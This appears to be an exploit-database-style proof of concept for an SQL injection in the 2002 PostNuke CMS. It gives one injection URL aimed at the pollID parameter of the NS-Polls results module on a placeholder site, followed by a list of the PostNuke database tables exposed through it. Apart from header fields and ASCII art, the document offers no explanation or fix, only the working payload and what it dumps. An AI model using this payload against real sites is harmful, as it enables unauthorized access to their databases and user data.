__________ __ _______ __ \______ \____ _______/ |_ \ \ __ __| | __ ____ | ___/ _ \/ ___/\ __\/ | \| | \ |/ // __ \ | | ( <_> )___ \ | | / | \ | / <\ ___/ |____| \____/____ > |__| \____|__ /____/|__|_ \\___ > \/ \/ \/ \/ *2002* # Exploit Title: PostNuke SQL injection # Date: 18/06/2023 # Exploit Author: Emiliano Febbi # Vendor Homepage: http://www.postnuke.com/ # Software Link: http://www.postnuke.com/module-Content-view-pid-2.html # Version: 2002 # Tested on: Windows 10 [code] ._ _______. */ ///______I ) . /_(_) /__/ *PoC* ############################################################################################ #http://www.site.it/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2*'*# SQLi<= ############################################################################################ structure:\ ######## tables:# ######## nuke_re nuke_quotes nuke_queue nuke_priv_msgs nuke_pollcomments nuke_poll_desc nuke_poll_data nuke_poll_check nuke_modules nuke_module_vars nuke_message nuke_links_votedata nuke_links_newlink nuke_links_modrequest nuke_links_links nuke_links_editorials nuke_links_categories nuke_languages_translation nuke_languages_file nuke_languages_constant nuke_hooks nuke_headlines nuke_groups nuke_group_perms nuke_group_membership nuke_gallery_vars nuke_gallery_servers nuke_gallery_rate_check nuke_gallery_rate nuke_gallery_plugins nuke_gallery_pictures_newpicture nuke_gallery_pictures nuke_gallery_media_types nuke_gallery_media_class nuke_gallery_comments nuke_gallery_categories nuke_faqcategories nuke_faqanswer nuke_ephem nuke_downloads_votedata nuke_downloads_subcategories nuke_downloads_newdownload nuke_downloads_modrequest nuke_downloads_editorials nuke_downloads_downloads nuke_downloads_categories nuke_counter nuke_comments nuke_blocks_buttons nuke_blocks nuke_bannerfinish nuke_bannerclient nuke_banner nuke_autonews ._________. */ ///______I ) . /_(_) /__/*End PoC* [/code] @2023